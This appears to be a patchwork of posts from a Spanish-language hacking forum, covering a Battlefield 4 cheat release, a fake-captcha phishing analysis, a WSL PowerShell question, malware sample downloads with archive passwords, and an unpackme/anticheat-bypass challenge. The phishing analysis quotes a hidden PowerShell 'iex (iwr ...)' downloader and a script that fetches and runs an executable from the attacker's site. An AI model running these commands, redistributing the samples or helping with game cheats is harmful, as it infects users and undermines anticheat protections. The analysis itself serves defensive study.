Hola, aqui les comparto mi cheat de BF4 , esta actualizado.  recuerde dejar una estrella en el repositorio.

Source Code : https://github.com/DestroyerDarkNess/BF4-External

Descarga : https://github.com/DestroyerDarkNess/BF4-External/releases/tag/4.3

---

Se recomiendo proteger el ejecutable para "mutar" el binario , recomiendo usar mi protector : https://toolslib.net/downloads/viewdownload/600-hydranet/

1) Abrir el juego y ponerlo en modo sin bordes, para ello dirijete a Configuracion - Video y cambia modo Pantalla Completa:



2) Abrir el Cheat y seleccionar el modo de ejecucion , Se recomienda la opcion 1.Load in Other process : El cheat se ejecutara dentro de la calculadora de windows.

3) Activacion : Insert

Captura de Pantalla :

Solo encontré un repo : https://github.com/delphi-pascal-archive/M0rph1ne-3.5 intente compilarla usando rad studio de delphi , pero vali verga.

alguien sabe donde puedo conseguir el binario de ese packer ?

les llegara un correo como este :




Entraremos en la url del correo para analizar rápidamente como funciona: https://github-scanner.com

Lo primero que vemos al entrar es que te pide que verifiques eres humano ;

Oh Sorpresa, esta verificación si esta rara        




El sitio pega en tu portapapeles la siguiente lineal de código :

powershell.exe -w hidden -Command "iex (iwr 'https://github-scanner.com/download.txt').Content" # "✅ ''I am not a robot - reCAPTCHA Verification ID: 93752"

Como estamos viendo en el codigo de arriba, esto se denominaria downloader., un cargador para otra pieza de codigo, veamos el codigo que descarga.

$webClient = New-Object System.Net.WebClient
$url1 = "https://github-scanner.com/l6E.exe"
$filePath1 = "$env:TEMP\SysSetup.exe"
$webClient.DownloadFile($url1, $filePath1)
Start-Process -FilePath  $env:TEMP\SysSetup.exe
 

alv esto tambien es otro downloader, bueno hagamosle un virustotal a ese l6E.exe que descargar : Analisis




Hechando un ojo al virustotal, esto tambien parece un downloader/dropper hecho en c#. descargara mas cosas raras . etc...

Hola, bueno comparto un pequeño aporte , wao hace tiempo que no hago un aporte en Batch .

¿Qué es la virtualización de proyectos en Python?
La virtualización de proyectos en Python se refiere al uso de entornos virtuales para aislar las dependencias y configuraciones de un proyecto específico.

Cómo funciona un entorno virtual ?

• Crea un entorno independiente donde puede instalar paquetes y dependencias sin afectar el sistema Python en general.
• Cada entorno virtual tiene su propio directorio de paquetes y binarios.

---

Hola tengo un problema , que ni con IA he podido solucionar, el siguiente codigo lo hice para obtener los diferentes usuarios de diferentes distribuciones WSL , en powershell :

 
function Invoke-CmdCommand {
    param (
        [string]$Command
    )
    Write-Host "Command: $Command"
    # Configurar el proceso
    $process = New-Object System.Diagnostics.Process
    $process.StartInfo.FileName = "cmd.exe"
    $process.StartInfo.Arguments = "/c $Command"
    $process.StartInfo.RedirectStandardOutput = $true
    $process.StartInfo.RedirectStandardError = $true
    $process.StartInfo.UseShellExecute = $false
    $process.StartInfo.CreateNoWindow = $true  # Ocultar la ventana del proceso
 
    # Iniciar el proceso
    $process.Start() | Out-Null
 
    # Capturar la salida y el error
    $output = $process.StandardOutput.ReadToEnd()
    #$errors = $process.StandardError.ReadToEnd()
 
    # Esperar a que el proceso termine
    $process.WaitForExit()
 
    # Comprobar si hay errores y manejar la salida
    #if ($process.ExitCode -ne 0) {
    #    throw "El comando falló con el código de salida $($process.ExitCode). Error: $errors"
    #}
 
    return $output
}
 
function IsWSLInstalled {
    $wslStatus = wsl --list --verbose 2>&1
    if ($wslStatus -match "The term 'wsl' is not recognized") {
        return $false
    }
    return $true
} 
 
function GetWSL {
    # Get the list of WSL instances
    $wslInstances = wsl --list --quiet | Where-Object { $_ -ne '' }
    Write-Host "WSL instances: $($wslInstances -join ', ')"
 
    # Select instance using Out-GridView
    $selectedInstance = $wslInstances | Out-GridView -Title "Select WSL Instance" -PassThru
    if (-not $selectedInstance) {
        Write-Error "No WSL instance selected."
        return $null
    }
 
    return $selectedInstance
}
 
function Main { 
    # Check if WSL is installed
    if (-not (IsWSLInstalled)) {
        Write-Error "WSL is not installed. Please install WSL to proceed."
        exit
    }
 
    # Call the GetWSL function
    $instance = Read-Host "Enter the name of the WSL instance" #GetWSL
 
    # Check if an instance was selected
    if ($null -eq $instance) {
        Write-Error "No WSL instance was selected."
        exit
    }
    else {
        Write-Host "Selected WSL instance: $instance"
    }
 
    try {
        $wslHomeCommand = "ls -d /home/*"  
        $command = "wsl -d $instance -- bash -c `"$wslHomeCommand`""
        $Users = Invoke-CmdCommand -Command $command
        Write-Host "Output: $Users"
        Read-Host "Press Enter to exit"
    }
    catch {
        Write-Error "Error: $_"
    }
}
 
Main
 
 

bien el error lo tengo en esta parte del codigo :

 $instance = Read-Host "Enter the name of the WSL instance" #GetWSL
 

asi lo tengo para meter el nombre de la distribucion manualmente , en este caso yo introduzco "Ubuntu-20.04" el codigo funciona perfectamente.

pero si uso la funcion que comente : "GetWSL" el desplega la siguiente interfaz :



Se lecciono el primer item y he mostrado en consola el resultado , en este caso devuelve lo mismo que yo escribo manualmente  "Ubuntu-20.04" , pero en este caso , a pesar de que es el mismo string q yo escribo manualmente, por alguna razon me da este error : "No hay ninguna distribuci¾n con el nombre proporcionado."

Apesar de que los datos son los mismo , solo que en uno yo lo introduzco manualmente y en el otro lo selecciono con una UI, y he imprimido los datos introducidos en ambos casos y es : "Ubuntu-20.04" , por lo que deberia funcionar igualmente el script, pero no lo hace.

Agradeceria cualquier ayuda! gracias.

Bueno , no pregunten como, pero encontre un malware .

VirusTotal : https://www.virustotal.com/gui/file/1f7b1a063e0a51a906a2da7e73177b527a42eef3daa8e879068ade7b2cb83ecf/behavior
Link : https://www.transfernow.net/dl/20240725Okk4541F

Rar Pass: 1234

Herramienta de recuperacion : https://github.com/SineStriker/synaptics-recover

Hola a todos, se acuerdan de este post de hace casi 3 años!!? : DragonTube

Basicamente ese clienta era un navegador que cargaba la pagina de youtube Con algunos parches js y algunas cosas extras.

Bueno, Decidí hacer un nuevo cliente , pero esta vez , mas ligero, Sin hacer uso de un navegador web para funcionar. Lo llame MusiCloud... Lo se , no se me dan bien los nombres. 

---

Tomé mi NETBuilderInjection y lo convertí en un Protector, pero no sé qué tan seguro es. (Para mí, es lo suficientemente seguro).

Así que hice este pequeño programa. Los objetivos son:

[Unpackme] Deberías descomprimirlo y obtener el código más limpio posible.
[Crackme] En el cuadro de texto donde se muestra el HWID debes modificar el texto y escribir algo más en él.
[Bypassme] Deberá desactivar "Falcon Anticheat" del ejecutable.

En cualquiera de los objetivos deberás compartir el binario, para verificar su trabajo.

-------------------------------------------------- --------------------------

Dificultad: Desconocida
Lenguaje Base : .NET
Plataforma: Windows - .NET Framework 4.6
Versión del sistema operativo: Todos
Empaquetador/Protector: NETBuilderInjection mejorado (en C) + VMP
Descripción :
NETBuilderInjection le permite generar un ensamblado Dll.NET que se puede inyectar fácilmente en cualquier proceso como cualquier dll nativo. pero en sí mismo es un empacador. Le hice algunas mejoras.
Descargar:

Unpackme.7z

Captura de pantalla :

Hola, Resumiendo, en la universidad donde estudio hay maquinas viejas con windows xp y algunas tienen todo tipos de virus que se propagan por USB y bueno, como esta sección es Analisis y Diseño de malware, entonces lo comparto con ustedes. 

La contraseña del comprimido es: 1234

https://easyupload.io/t2ph3a

Hola a todos, vengo a compartir el codigo fuente de mi aplicacion StrelyCleaner.

• Hardware Info               ✅                 Muestra información importante sobre tu PC.
• Antivirus                        ✅                 Un pequeño antimalware, es especialmente potente para detectar y desinfectar dispositivos USB.
• System/Game Booster. ✅                 Optimice Ram y CPU y mejore el rendimiento general.
• Cleaner                         ✅                 Limpia la basura que dejan las aplicaciones en tu PC.
• System Tweats             ✅                 Puede elegir qué función activar/desactivar para mejorar su sistema.
• Custom App Themes    ✅                 Esta aplicación está hecha con Winform, pero aún así no tiene por qué ser fea.

---